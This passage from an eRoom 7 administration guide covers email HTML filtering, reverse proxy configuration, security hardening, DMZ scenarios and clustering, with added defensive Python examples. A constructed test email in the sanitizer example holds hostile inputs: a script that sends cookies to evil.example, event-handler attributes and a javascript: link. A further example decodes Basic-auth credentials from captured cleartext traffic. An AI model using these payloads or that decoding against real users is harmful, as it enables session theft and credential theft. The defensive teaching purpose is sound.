eRoom items so that they can be edited with our rich text editor. Incoming email messages
in HTML format will have all non-supported HTML stripped from them, including style
sheets, script (VBScript and JavaScript), and other non-standard tags. It is important to
note that all script is removed, which prevents potential security problems caused by
malicious script. Inline images are retained, and can be edited in the rich text editor.
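As an added example, not code from this guide or from eRoom, here is a Python conversion of one message from the SMTP drop directory into the page fields described above (title from the subject, attachments whose MIME type cannot be recognised named “Attachment N.txt”), together with the HTML filtering described under HTML email messages: an allowlist of tags and attributes, script and style blocks removed with their contents, event-handler attributes and javascript:/vbscript: URLs dropped, inline cid: images kept. The sample message, its addresses and its attachment type are constructed; the exact tag and attribute lists are this example's choice, not eRoom's.

```python
import email
import mimetypes
from email import policy
from html import escape
from html.parser import HTMLParser

# Tags/attributes an inbox page may keep; any other tag is dropped, its text kept.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "img", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt", "width", "height"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:", "cid:")   # cid: = inline image part
DROP_WITH_CONTENT = {"script", "style", "head"}         # tag and its text both go

def _safe_url(value):
    # Remove whitespace/control characters first so "java\tscript:" is caught too.
    v = "".join(c for c in value if c.isprintable() and not c.isspace()).lower()
    return ":" not in v.split("/")[0] or v.startswith(SAFE_SCHEMES)

class InboxHtmlSanitizer(HTMLParser):
    # Allowlist filter: script/style blocks vanish with their content, on*
    # handlers never pass the attribute allowlist, script: URLs are dropped.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if self.skip or tag in DROP_WITH_CONTENT:
            self.skip += tag in DROP_WITH_CONTENT
        elif tag in ALLOWED_TAGS:
            kept = ""
            for name, value in attrs:
                if name in ALLOWED_ATTRS.get(tag, ()) and (
                        name not in ("href", "src") or _safe_url(value or "")):
                    kept += f' {name}="{escape(value or "", quote=True)}"'
            self.out.append(f"<{tag}{kept}>")
            if tag not in ("br", "img"):
                self.open.append(tag)

    def handle_endtag(self, tag):
        if self.skip:
            self.skip -= tag in DROP_WITH_CONTENT
        elif tag in self.open:           # also closes anything left open inside it
            closed = None
            while closed != tag:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize_inbox_html(raw_html):
    p = InboxHtmlSanitizer()
    p.feed(raw_html)
    p.close()
    p.out.extend(f"</{t}>" for t in reversed(p.open))   # tags never closed
    return "".join(p.out)

def convert_message(raw_bytes):
    """Map one message from the SMTP drop directory to inbox page fields."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    page = {"title": str(msg["Subject"] or "(no subject)"), "attachments": []}
    bodies, unknown = {}, 0
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if part.is_attachment():
            name = part.get_filename()
            if not name or mimetypes.guess_extension(ctype) is None:
                unknown += 1              # type not recognised: "Attachment N.txt"
                name = f"Attachment {unknown}.txt"
            page["attachments"].append((name, part.get_payload(decode=True)))
        elif ctype in ("text/html", "text/plain"):
            bodies.setdefault(ctype, part.get_content())
    html = bodies.get("text/html")
    page["body"] = (sanitize_inbox_html(html) if html is not None
                    else escape(bodies.get("text/plain", "")))
    return page

# Constructed sample message (not a real capture); addresses are hypothetical.
SAMPLE_MESSAGE = b"""\
From: alice@partner.example
Subject: Design review notes
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html; charset="utf-8"

<html><head><style>p{color:red}</style></head><body>
<p onclick="steal()">Notes <b>attached</b>.</p>
<script>location='http://evil.example/?'+document.cookie</script>
<a href="javascript:alert(1)">link</a> <img src="cid:chart1" onerror="x()">
</body></html>
--B1
Content-Type: application/x-unknown-cad
Content-Disposition: attachment

AAEC
--B1--
"""
```

The filter is deliberately an allowlist rather than a blocklist of known-bad tags: anything not listed is dropped with its attributes, so a tag the author never thought of cannot carry script. The cid: scheme is kept only because inline images are referenced that way; if your deployment does not need inline images, remove it from SAFE_SCHEMES.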
Appendix B: Configuring a Reverse Proxy Server with eRoom 7
Follow these steps to configure eRoom 7 with a reverse proxy (RP) server. This
configuration ensures that eRoom requests are properly redirected through the reverse
proxy to the eRoom web server. First you configure the reverse proxy, and then the eRoom
web server.
Important: Verify that the reverse proxy server you are using is fully supported to work
with eRoom Server 7. If you’re not sure, contact eRoom Technical Support.
For this example, assume that:
• End users want to access eRoom by using eroom.company.com.
• There are two servers, as follows:

Server   Description            Fully Qualified Domain Name   IP Address
app1     eRoom Server           app1.company.com              192.168.1.100
proxy    reverse proxy Server   proxy.company.com             192.168.1.99
Configure the Reverse Proxy Server
1. Configure the public DNS server to resolve eroom.company.com to the reverse proxy
server IP (192.168.1.99).
Note: In some configurations the reverse proxy server may need two IP addresses (on one
or two NICs): one for external (Internet) use and one for the internal network. In that
case, public DNS should resolve to the external (Internet) IP. TCP/IP settings can be set
in Windows Control Panel / Network Settings. Consult a qualified network administrator to
make sure the reverse proxy network settings are correctly configured before testing
with eRoom Server.
2. Configure the reverse proxy to forward client requests to the eRoom server, using the
eRoom server's fully qualified domain name.
Example From: https://proxy.company.com
To: https://app1.company.com
3. Test accessing the default home page (of the eRoom web server) from a client
workstation. For testing purposes, the HOSTS file on a client workstation can be
configured to resolve eroom.company.com to the external IP of the reverse proxy (if you
skipped step 1 for DNS setup).
4. Configure the RP to forward all the /eRoomXXX virtual roots on the reverse proxy server
to the eRoom server. These include:
/eRoom
/eRoomASP
/eRoomData
/eRoomExtpages
/eRoomHelp
/eRoomReq
/eRoomSetup
/eRoomXML
Example From: https://proxy.company.com/eRoomasp
To: https://app1.company.com/eRoomasp
Note: If you want to disable the reverse proxy server for users inside the firewall, you
can do so on the Edit eRoom Server dialog, accessible through the eRoom Server
Administration utility. (This requires that internal users can resolve the reverse proxy
DNS name.)
Configure the eRoom Web Server
1. On the eRoom server, the fully qualified domain name eroom.company.com should be
mapped to the true eRoom server (192.168.1.100). You can do this by modifying the
HOSTS file with an entry that resolves eroom.company.com to 192.168.1.100 (the IP
of the eRoom server itself).
2. Choose Start > Programs > eRoom Administration > eRoom Server Administration to
open the eRoom Server Administration utility.
3. Right-click on the eRoom server and choose “Edit Server”.
4. In the Full Servername field, enter the RP server name.
5. In the Reverse Proxy Server section, check the “This eRoom server is being used through
a reverse proxy server” checkbox.
6. Specify any other Reverse Proxy Section settings as necessary.
Notes
On overriding the eRoom web server name in eRoom Server Settings
• When the eRoom server name is overridden, eRoom responds to requests addressed to
app1.company.com with its own HTTP redirects (response code 301) to the server name
specified in eRoom Server Settings. The preceding procedure (Configure the eRoom Web
Server) allows you to override the eRoom server name and ensure that, on the eRoom
server itself, eroom.company.com resolves to the true eRoom server (instead of
redirecting and resolving back to the reverse proxy in a loop).
• The override web server name set in eRoom Server Settings is also what ensures that
URLs in eRoom email notifications and invites/alerts are sent out using the public name
eroom.company.com rather than the internal eRoom server name app1.company.com. End users
can then click the link in eRoom emails and resolve to the reverse proxy (as long as
DNS is correctly set up).
• When accessing eRoom from a browser on the eRoom server itself, eroom.company.com
resolves locally to the eRoom server (rather than back to the RP). IIS will also likely
respond to app1.company.com, localhost, or its own IP address (192.168.1.100). However,
access to the web server using the true name or IP address of the eRoom server should
be unpublicized and restricted by firewalls.
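The following Python script is an added example (not from this guide or from eRoom) that checks the outcome of the procedure above and of the notes on the server-name override: probed from outside the firewall as a browser would, every /eRoomXXX root should come back through the proxy rather than as a 404, and any 301 that eRoom issues should name the public eroom.company.com, never app1.company.com (a Location pointing at app1 means the Full Servername override was not applied and will leak the internal name to external users). The response list is constructed for the guide's example hosts; probe() is the live helper you would run in its place, and the trailing "/" it appends is an assumption.

```python
import http.client
import ssl
from urllib.parse import urlsplit

# Virtual roots the guide says the reverse proxy must forward to the eRoom server.
EROOM_ROOTS = ["/eRoom", "/eRoomASP", "/eRoomData", "/eRoomExtpages",
               "/eRoomHelp", "/eRoomReq", "/eRoomSetup", "/eRoomXML"]


def probe(public_name, path, timeout=10):
    """Fetch one root through the proxy, as an outside client, without following
    redirects. Live network call; the offline audit below does not use it."""
    conn = http.client.HTTPSConnection(public_name, timeout=timeout,
                                       context=ssl.create_default_context())
    conn.request("GET", path + "/", headers={"Host": public_name})
    resp = conn.getresponse()
    return path, resp.status, resp.getheader("Location")


def audit_proxy(responses, public_name, internal_name):
    """responses: (path, status, location) tuples as seen from outside the firewall.
    Flags roots the proxy does not forward, redirects that expose the eRoom
    server's real name (the override in Edit Server is missing) and redirects
    that drop back to plain http."""
    findings = []
    probed = {p.lower() for p, _, _ in responses}
    for root in EROOM_ROOTS:
        if root.lower() not in probed:
            findings.append(f"{root}: not probed")
    for path, status, location in responses:
        if status in (301, 302, 307) and location:
            parts = urlsplit(location)
            host = (parts.hostname or "").lower()
            if host == internal_name.lower():
                findings.append(f"{path}: redirect leaks internal name {internal_name}")
            elif host and host != public_name.lower():
                findings.append(f"{path}: redirect to unexpected host {host}")
            elif parts.scheme == "http":
                findings.append(f"{path}: redirect downgrades to http")
        elif status == 404:
            findings.append(f"{path}: not forwarded by the proxy (404)")
        elif status >= 500:
            findings.append(f"{path}: upstream error {status}")
    return findings


# Constructed responses for the example hosts in the guide (not a real capture).
SAMPLE_RESPONSES = [
    ("/eRoom", 301, "https://eroom.company.com/eRoom/"),         # correct public name
    ("/eRoomASP", 200, None),
    ("/eRoomData", 200, None),
    ("/eRoomExtpages", 200, None),
    ("/eRoomHelp", 301, "https://app1.company.com/eRoomHelp/"),  # override not set
    ("/eRoomReq", 404, None),                                     # forwarding rule missing
    ("/eRoomSetup", 200, None),
]                                                                 # /eRoomXML never probed

if __name__ == "__main__":
    for line in audit_proxy(SAMPLE_RESPONSES, "eroom.company.com", "app1.company.com"):
        print(line)
```

Run the probes from a workstation outside the firewall so that the DNS and HOSTS entries in play are the ones external users will see; a probe from the eRoom server itself resolves eroom.company.com locally (see the last note above) and would not exercise the proxy at all.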
On securing the configuration
• When securing both the eRoom and proxy servers, use proper care and testing to ensure
that the security does not impair functionality of either application.
• SSL can be installed on the reverse proxy to ensure a secure connection with client
workstations. This means clients would use “https://” instead of “http://”.
• SSL can also be installed on the eRoom web server to ensure a secure connection
between the RP and the eRoom server. However, some proxy servers may not be able to
forward to a web server over “https://”. Without it, traffic between the RP and the
eRoom server, including credentials and session IDs, crosses the internal network in
the clear.
• In eRoom 7, an SSL certificate must be installed on the eRoom web server for eRoom to
recognize “https://” instead of “http://”. eRoom automatically recognizes that the SSL
certificate is installed and required. After applying the SSL certificate to the eRoom
server, you need to ensure that users use SSL (users cannot have the choice of whether
or not to use “https://” in the URL address). Otherwise, the URL addresses in the
notifications, alerts, and invitations will be incorrect. For instructions on how to
force the use of SSL for connected users, refer to the Documentum Support Notes on the
Documentum Support site.
• If an SSL certificate cannot be installed on the eRoom web server, an alias might be
created so that “http://” requests get translated to “https://” automatically.
Appendix C: eRoom Security Guidelines
eRoom Server Operating System Hardening
Properly configured and maintained, with appropriate security patches, Microsoft's IIS is
a robust platform that can substantially reduce the risks inherent in running
Internet-accessible applications. The most critical issue to consider for network
applications like eRoom 7 is the exposure of remote services. Access to all services must
be restricted to those necessary for the server to function. This is typically done at
two levels: network and host.
At the network level, we strongly recommend using firewalls and routers to restrict access
to services (ports). At the host level, NT-based customers can use TCP/IP filtering to limit
exposure of unnecessary services. Windows 2000-based customers can use IPSec filters to
perform this task more efficiently, because they can be applied on the fly and they
correctly block ICMP.
It is especially important that you either block or disable access to such standard Windows
services as NetBIOS/SMB resource sharing (TCP 135, 137-139 and 445; UDP 137-138).
Attackers can use well-known techniques over these services to enumerate the names of
system accounts and then perform password-guessing attacks against them.
eRoom Security
By default, eRoom provides password-protected entry into eRooms and can synchronize
usernames and passwords through NT/Win2000 Domains or LDAP.
How does the eRoom server recognize a legitimate eRoom client?
Before granting access to information, eRoom asks users to log into the specified eRoom
with a username and a self-selected password.
Once the eRoom server authenticates the user, it generates a random session ID that serves
as the key for the duration of the session. Because the session ID is random and
unpredictable, an attacker cannot guess or forge one. It is, however, only as secret as the
transport that carries it: an eavesdropper who captures a session ID from an unencrypted
(non-SSL) connection can replay it for as long as the session lasts (see Appendix C). To
properly log out from eRoom and destroy this session ID, users must exit the browser.
When logging into the eRoom Server via the browser, users can check "Save password" on
the Login dialog box, and eRoom saves the password in an encrypted form on the client
machine. The saved password is vulnerable to reuse, however, if it is stolen and copied to
another machine. For added security, the eRoom administrator can disable the save password
option.
On the server side, the eRoom server does not store passwords for users that come from a
Windows NT/2000 domain, Active Directory, or LDAP directory. The passwords of other
users are stored on the eRoom server as MD5 hashes (a one-way hash, not reversible
encryption). Note that MD5 is a fast hash, so an attacker who obtains the site database
can test password guesses against these hashes quickly; where you can, prefer
directory-backed accounts, which keep no password on the eRoom server at all.
The server can also be configured to record failed login attempts. External directories can
be configured with account lockout rules, for example, to disable an account after multiple
failed login attempts. These rules will be effective with eRoom authentication for accounts
coming from such directories.
On the client side, eRoom access is provided by means of a browser. The browser can be
augmented with plug-in components. The plug-in enhanced browser uses a Microsoft ActiveX
control for its main functionality. The control, ERAdddin.OCX, is programmatically marked
“safe for scripting”, which tells Internet Explorer that script on any web page may call
the control's methods without prompting the user.
Since safe-for-scripting controls have been exploited within other software products to
perform unauthorized actions on end-user systems, eRoom implements a mechanism whereby
trusted servers are tracked and the control is not accessible except by those servers on
the trusted list. In addition, eRoom provides an alternative for customers who wish to
avoid using ActiveX technology entirely: they can use the thin client (a server-side
configuration parameter can force all users to connect with the thin client only).
Although eRoom has taken steps to obfuscate user credentials stored on the rich client
system, we cannot guarantee that a dedicated, resourceful attacker could not obtain this
information given enough time. Thus, client environments should also be well protected
through policy and physical security mechanisms.
How is access to eRoom information controlled?
Access control is available from the facility level down to each individual object in an eRoom.
eRoom member lists define who can access each eRoom and facility on the server and access
control lists manage access to all eRoom objects.
Access control is fully implemented at the server. That means that even in the unlikely event that
the client code is compromised, or if the server is being “spoofed,” the server continues to enforce
access limitations. The server has no implicit trust of client-side code; it performs authentication
and authorization checks based solely on credentials provided by the client, such as name and
password.
Using eRoom within an Internal Network
eRoom uses standard HTTP for all its communications, in both directions. Consequently, if your
systems and firewalls are configured so that a specific person can use a web browser to access a
certain web server, then the user will also be able to access an eRoom running on that server.
Access to the eRoom server via the browser uses JavaScript to perform some actions. In
addition, the eRoom “rich client” uses plug-in components to provide additional services to
the user. Consequently, it is important that the browser and firewall configurations do not
block either of these. If the firewall filters by content type, you need to allow the MIME
type application/octet-stream to pass through it.
Using eRoom in the Extended Enterprise
Many current eRoom customers use their eRooms with employees, suppliers, clients, and
partners that are not part of their internal network. They require a security solution that
enables continuous remote access to the eRoom application. The following sample
scenarios present common configurations that customers use and the security technologies
that they require.
Scenario 1: eRoom on the extranet
Many eRoom customers put their eRoom server on the extranet. Installing eRoom on a web
server outside the firewall means that securing, or “hardening”, the server becomes very
important. The most important thing you can do to ensure the security of such a
configuration is to ensure that the only ports enabled on the Windows NT or Windows 2000
Server are those necessary for the required services. Such services include either of the
following:
• HTTP (port 80)
• HTTPS (port 443)
Depending on your company’s needs, you might also make one or more of the following
accessible through the firewall:
• SMTP (port 25)
• POP3 (port 110)
• SQL Server (port 1433), only between the eRoom server and the database server, never
from the Internet
Make sure that no File Services, FTP, or similar services are enabled.
This configuration provides three levels of defense:
• Windows NT and Windows 2000 Server's security to protect access to all resources
• Microsoft IIS Web Server for security
• eRoom software to protect access
In addition to hardening the server, eRoom recommends using SSL and digital certificates to
protect information during transmission in the extranet environment.
About Secure Sockets Layer (SSL)
SSL is a protocol designed to provide security during the transmission of sensitive data over
TCP/IP. SSL provides data encryption, server authentication, and message integrity for data
transmission over the Internet. SSL can provide a secure transport layer for communications
with your eRoom Server.
Since some forms of eRoom authentication are based on protocols that send Base64-encoded
passwords, an authentication session can be captured and decoded trivially using
eavesdropping tools: Base64 is an encoding, not encryption. The risk of an attacker being
situated on the public Internet in a position to eavesdrop on such traffic is low.
Nevertheless, the risk is present, and it may be greater for large organizations with
multiple network segments between eRoom servers and clients. eRoom Server Administrators
should be aware of the risks involved in using eRoom “out-of-the-box” without SSL
configured. We recommend using SSL.
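What "captured and analyzed" amounts to in practice, as an added Python example (not from this guide or from eRoom): decoding the Basic Authorization header from a captured request, and listing what is exposed when the capture was taken off the wire rather than from inside an SSL session. The request, its path, the cookie name and the credentials are constructed; the cookie name is a placeholder, not eRoom's.

```python
import base64
import binascii


def parse_http_request(raw):
    """Split a captured HTTP request into (method, target, headers dict)."""
    head = raw.partition(b"\r\n\r\n")[0].decode("iso-8859-1")
    request_line, *header_lines = head.split("\r\n")
    method, target = request_line.split(" ")[:2]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def basic_credentials(authorization):
    """Recover (user, password) from an 'Authorization: Basic ...' value, or None.
    Base64 is reversible by anyone, so this is exactly what an eavesdropper does."""
    scheme, _, token = authorization.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        text = raw.decode("iso-8859-1")
    user, sep, password = text.partition(":")   # only the first ':' separates
    return (user, password) if sep else None


def audit_capture(raw, over_tls):
    """Findings for one captured request: nothing is exposed if the capture came
    from inside an SSL session, everything is if it came off the wire."""
    method, target, headers = parse_http_request(raw)
    findings = []
    if over_tls:
        return findings
    creds = basic_credentials(headers.get("authorization", ""))
    if creds:
        findings.append(f"{method} {target}: Basic credentials for '{creds[0]}' in the clear")
    if "cookie" in headers:
        findings.append(f"{method} {target}: session cookie in the clear (replayable)")
    return findings


# Constructed capture (not real traffic): the facility/room path and the cookie
# name are placeholders; the credentials are alice / s3cret.
CAPTURE = (b"GET /eRoom/Projects/DesignReview HTTP/1.1\r\n"
           b"Host: eroom.company.com\r\n"
           b"Authorization: Basic YWxpY2U6czNjcmV0\r\n"
           b"Cookie: session=3f9c2a\r\n"
           b"\r\n")

if __name__ == "__main__":
    for line in audit_capture(CAPTURE, over_tls=False):
        print(line)
```

Note that Basic credentials are resent by the browser on every request for the rest of the session, not only at login, so a single capture anywhere in the session yields the password; with SSL in place the same bytes are inside the encrypted stream and the audit reports nothing.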
About digital certificates
Digital certificates are available for both the server and the client. A server-side digital
certificate is analogous to an ID card for the server. Verified by a third-party certificate
authority, a digital certificate is a complete set of information about its owner, based on an
Internet standard.
What are the advantages of using digital certificates?
Together with SSL, digital certificates secure communications on the Web by providing the
following:
• Authentication. When a server has a Digital ID, client browsers can verify that they are
dealing with a legitimate source. The client verifies the identity of the server before
accepting its public key and beginning the SSL session.
• Message privacy. All traffic between the server and browser is encrypted using a unique
"session key." Each session key is used with only one customer during one connection,
and that key is itself encrypted with the server’s public key. These layers of privacy
protection are designed to ensure that information cannot be intercepted or viewed by
unauthorized parties. (Note: Encryption is provided in both directions even if only the
server has a Digital ID.)
• Message integrity. The contents of all communications between the server and the
browser are protected from being altered en route. Each end of that transmission
knows that what it receives is exactly what was sent from the other side.
Using a recognized certificate is the easiest and most reliable way to enable SSL. eRoom
and the Internet Server Access API will work correctly with SSL and Digital Certificates
when using either Microsoft Internet Explorer or Netscape Navigator.
When communication with the server is encrypted with SSL, login information is securely
delivered to the server, which then authenticates the user's name and password. Because
the client has verified the server's certificate first, the eRoom client cannot be spoofed
into revealing a username and password pair to an impostor. All communication is then
encrypted for the life of the user’s session. eRoom supports all versions of SSL
technology, though SSL v3 or higher is recommended due to the cryptographic enhancements
in that version; SSL v2 has known weaknesses and should be disabled on the server.
Scenario 2: Using eRoom within a DMZ
A DMZ is a firewall-protected network space that allows limited access to web-based
services by outside parties. Although DMZs are widely used within corporate IT
organizations to protect public web servers, they are increasingly required for
business-to-business activities, including transaction-based applications and
collaboration tools such as eRoom.
There are many possible variations of the DMZ, but the basic concept is that external users
are allowed access on a limited number of ports (often just the SSL port) to hosts on the
DMZ subnet. There is essentially an “external firewall” that does packet-level filtering to
allow specific access by port to hosts in the DMZ and then there is an “internal firewall”
that prevents any access to internal hosts.
At this most basic level, barriers to entry for external users are low. The security risk is
“contained” in the DMZ and can be further reduced by requiring all SSL-connections and
disabling all other ports.
As mentioned previously, each company needs to decide whether or not to open up the
internal firewall for specific services, such as SMTP mail access or SQL Server database.
[Figure: DMZ]
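The following is an added example, not from the eRoom guide, that models the two-firewall DMZ described in Scenario 2 as a pair of first-match packet filters: the external firewall admits outside traffic to the DMZ only on the SSL port, and the internal firewall admits nothing from the DMZ to internal hosts unless a specific service has been opened deliberately. The host names and the decision to open SQL Server on port 1433 are constructed assumptions for the example.

```python
from dataclasses import dataclass
from typing import List, Optional

# Added example, not from the eRoom guide: a small model of the two-firewall
# DMZ. Host names ("eroom-web", "sqlserver") and the opened SQL Server port
# are constructed assumptions.


@dataclass(frozen=True)
class Rule:
    src_zone: str             # "internet", "dmz" or "internal"
    dst_host: str             # host name, or "*" for any host
    dst_port: Optional[int]   # None matches any port
    action: str               # "allow" or "deny"


@dataclass(frozen=True)
class Flow:
    src_zone: str
    dst_zone: str
    dst_host: str
    dst_port: int


class Firewall:
    """First-match packet filter with a default action (deny unless told otherwise)."""

    def __init__(self, name: str, rules: List[Rule], default: str = "deny"):
        self.name, self.rules, self.default = name, rules, default

    def decide(self, flow: Flow) -> str:
        for r in self.rules:
            if (r.src_zone == flow.src_zone
                    and r.dst_host in ("*", flow.dst_host)
                    and r.dst_port in (None, flow.dst_port)):
                return r.action
        return self.default


# External firewall: outside parties reach the DMZ only on the SSL port.
EXTERNAL = Firewall("external", [
    Rule("internet", "eroom-web", 443, "allow"),
])

# Internal firewall: the DMZ reaches internal hosts only for services that
# were opened on purpose (here SQL Server for the eRoom database).
INTERNAL = Firewall("internal", [
    Rule("dmz", "sqlserver", 1433, "allow"),
])


def path_decision(flow: Flow) -> str:
    """Apply every firewall the flow crosses; the first deny wins."""
    if flow.src_zone == "internet" and flow.dst_zone == "dmz":
        crossed = [EXTERNAL]
    elif flow.src_zone == "internet" and flow.dst_zone == "internal":
        crossed = [EXTERNAL, INTERNAL]
    elif flow.src_zone == "dmz" and flow.dst_zone == "internal":
        crossed = [INTERNAL]
    else:
        crossed = []          # internal-to-internal traffic crosses neither firewall
    for fw in crossed:
        if fw.decide(flow) == "deny":
            return f"deny ({fw.name})"
    return "allow"


if __name__ == "__main__":
    for f in (Flow("internet", "dmz", "eroom-web", 443),
              Flow("internet", "dmz", "eroom-web", 80),
              Flow("dmz", "internal", "sqlserver", 1433),
              Flow("dmz", "internal", "fileserver", 445),
              Flow("internet", "internal", "sqlserver", 1433)):
        print(f, "->", path_decision(f))
```

The point of the model is the default: every rule that is not written is a deny, so opening SMTP or SQL Server from the DMZ is a single explicit line on the internal firewall that can be reviewed, rather than something the outside world can reach through the DMZ host.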
Scenario 3: Using eRoom with a Proxy Server
The next level of security is usually implemented by requiring a stronger authentication
process through a proxy server.
Proxy servers act as mediators for all communication between the user on the internal
corporate network and a service on the Internet. Proxy servers can improve security by
performing more intelligent filtering – that is, they are more capable of filtering HTTP by
content type (for example, to remove Java or JavaScript) and better at virus detection
than packet filtering systems. Because of their positioning between a client and the
Internet, proxy systems also generate new IP packets for the client, thus protecting clients
from malformed IP packets.
A more secure version of this configuration is the reverse proxy server. In this scenario,
eRoom resides within a protected segment of the network with the reverse proxy in the
DMZ. External users’ requests are captured by the reverse proxy server and forwarded to
the eRoom server. The reverse proxy server adds an additional level of security by hiding
the eRoom servers’ true network address as well as by applying application layer rules.
Scenario 4: Using eRoom with a two-tiered authentication system
The most secure environments require the use of a two-tiered authentication system such
as SmartCards or RSA SecurID. These technologies require two forms of authentication,
based on something the user knows, such as a PIN number, and something the user has, a
physical authenticator. Both are required to access the network. This level of access is
available when using browser access with or without the optional plug-in, although there
may be some limitations to the plug-in functionality.
Scenario 5: Using eRoom with a single sign-on (SSO) system
Single sign-on (SSO) systems combine ease-of-use and security. An SSO solution, such as
Netegrity SiteMinder, performs user authentication and often combines it with entitlement
management. In such a situation, a user logs into the system only once, and then has
enterprise-wide access to all authorized resources. The SSO system enforces access policies
as well. Both with and without the optional plug-in, eRoom supports Netegrity SiteMinder,
although there may be some limitations to the plug-in functionality. Netegrity integration
requires a Documentum Consulting engagement.
Scenario 6: Using eRoom in a Virtual Private Network (VPN)
Clients can access eRoom servers using Virtual Private Networks (VPNs). Server information
and user data are encrypted, protecting clients from unauthorized access. VPN can be used
over phone lines or over the Internet. This allows corporations hosting eRoom to expand
access to the server without incurring large IT costs. The ISP is used to establish an
encrypted tunnel. The tunnel creates a secure connection between the user and the
enterprise customer's network over the Internet and is indistinguishable from a point-to-point
connection.
[Figure: DMZ]
Appendix E: Clustering Environment Setup
Before You Begin
Installing eRoom in a Clustered Environment involves the following:
• Hardware configuration
• Operating System, Network, and Disk Setup (on each node)
• Microsoft Windows Cluster Service installation
• eRoom installation
This document complements Microsoft’s Step by Step Guide to Installing Cluster Service.
Please download it from Microsoft’s web site and use it for your eRoom cluster setup.
Clustering Overview
How clustering works
The main benefit of configuring eRoom in a cluster is to minimize application downtime (by
eliminating human intervention in the case of a hardware, operating system, or application
problem). Both the eRoom web server and SQL server can be configured in a cluster. An
eRoom clustered environment consists of the following:
• Cluster hardware platform. Cluster-aware hardware.
• Operating system. Windows 2000 Advanced Server. Microsoft Cluster Service. Microsoft
Internet Information Server 5 (IIS 5).
• Database server. Microsoft SQL Server 2000 (separate from the web server). While
Internet Information Server (IIS) and the eRoom application must run on the same cluster,
eRoom recommends that you run the Microsoft SQL Server database on a separate cluster
or server. This configuration improves system performance, robustness, and scalability;
distributes possible failure points; and provides faster failover/recovery times.
• Shared disk. Shared disk storage external to the eRoom Server is required for clustered
environments. While the goal of a clustered environment is to provide high availability,
by no means should it be viewed as the only backup to production. This means that the
cluster should include Disk Arrays and be backed up daily to provide data recovery in
worst-case situations.
• eRoom application. The eRoom 7 application installation for Microsoft SQL Server.
A two-node cluster consists of two physical servers -- one server is the primary node and
the second server is the secondary node. In an Active/Passive cluster, the primary node is
the server that actively responds to client requests, while the passive node sits quietly
awaiting a failover. Both the eRoom web server and SQL servers will run as a primary node.
Should the primary node fail, then the secondary node takes over. When you build a two-node
cluster using Windows 2000 Advanced Server and Microsoft Clustering Service, each
node must be connected to a shared disk array using either SCSI cables or fibre channel.
Typically, this shared disk array is a standalone unit that houses a RAID 5 or RAID 10 disk
array. All of the shared data in the cluster must be stored on this disk array. Otherwise,
when a failover occurs, the secondary node in the cluster cannot access it. Keep in mind
that clustering does not help protect data or the shared disk array on which it is stored.
Therefore, make sure the shared disk array is very reliable and includes fault-tolerance.
In addition to connecting both servers to a shared disk array, both nodes of the cluster are
connected to each other via a private network. Each node uses this private network to
keep track of the status of the other node. For example, if the primary node experiences a
hardware failure, the secondary node detects this (via the private network) and
automatically initiates a failover.
How eRoom clients know what to do when a failover occurs
In a cluster configuration, you assign the web server its own virtual name and virtual IP
address (the SQL server also has its own unique virtual name and IP). Both web servers in
the cluster share the virtual name and address, and clients connect to the web cluster
using the virtual name. As far as a client is concerned, there is only one physical server, not
two. In an Active/Passive cluster design, the primary node responds to the client’s
requests.
If the primary node fails to respond, a failover to the secondary node occurs, and the
cluster still retains the same virtual name and IP address (with a new physical server
responding to client requests). The failover period can last a few minutes (for the SQL
server, the exact amount of time depends on the number and sizes of the databases on SQL
Server, and how active they are). During this failover time (of either eRoom or the SQL
server), clients are unable to access eRoom. Once a failover occurs, you must find out
what caused the failover, and then take the necessary action and correct the problem.
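The following is an added example, not from the eRoom guide, of a monitor that behaves like a client during a failover: it keeps polling the cluster's virtual name on the SSL port and measures how long the service stays unreachable, so the outage can be compared with the expected failover window and the cause investigated. The probe and clock are injected so the logic can be exercised offline against a constructed sequence of results; the real TCP probe at the end is for use on a live cluster.

```python
import socket
import time
from typing import Callable, Iterator, Optional

# Added example, not from the eRoom guide: measure how long the cluster's
# virtual name is unreachable during a failover. The probe and clock are
# injected so the function can run offline against constructed results.


def measure_outage(probe: Callable[[], bool],
                   clock: Callable[[], float] = time.monotonic,
                   sleep: Callable[[float], None] = time.sleep,
                   interval: float = 5.0,
                   max_wait: float = 600.0) -> Optional[float]:
    """Poll until the virtual name answers again.

    Returns the outage length in seconds (0.0 if the first probe succeeds),
    or None if the service has not come back after max_wait seconds, which
    is the signal that this is not an ordinary failover and someone must look
    at the cluster."""
    start = clock()
    while True:
        if probe():
            return clock() - start
        if clock() - start >= max_wait:
            return None
        sleep(interval)


def scripted_probe(results: Iterator[bool]) -> Callable[[], bool]:
    """Constructed probe that returns a scripted sequence of answers."""
    return lambda: next(results)


class FakeClock:
    """Constructed clock that advances only when the monitor sleeps."""

    def __init__(self) -> None:
        self.now = 0.0

    def time(self) -> float:
        return self.now

    def sleep(self, seconds: float) -> None:
        self.now += seconds


def tcp_probe(virtual_name: str, port: int = 443, timeout: float = 3.0) -> Callable[[], bool]:
    """Real probe: a TCP connect to the cluster's virtual name on the SSL port."""
    def attempt() -> bool:
        try:
            with socket.create_connection((virtual_name, port), timeout=timeout):
                return True
        except OSError:
            return False
    return attempt


if __name__ == "__main__":
    # Offline demonstration with a constructed outage of three failed polls.
    clk = FakeClock()
    outage = measure_outage(scripted_probe(iter([False, False, False, True])),
                            clk.time, clk.sleep, interval=5.0)
    print(f"service back after {outage} s")
    # On a live cluster: measure_outage(tcp_probe("eroom-cluster"))  # placeholder name
```

Because clients always use the virtual name, the probe does not need to know which physical node is active; a result of None after the configured wait is the cue that the failover itself has failed and the cause must be found before moving the cluster group back.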
Requirements
Hardware requirements
• Cluster aware hardware. For a list of Microsoft supported cluster hardware devices,
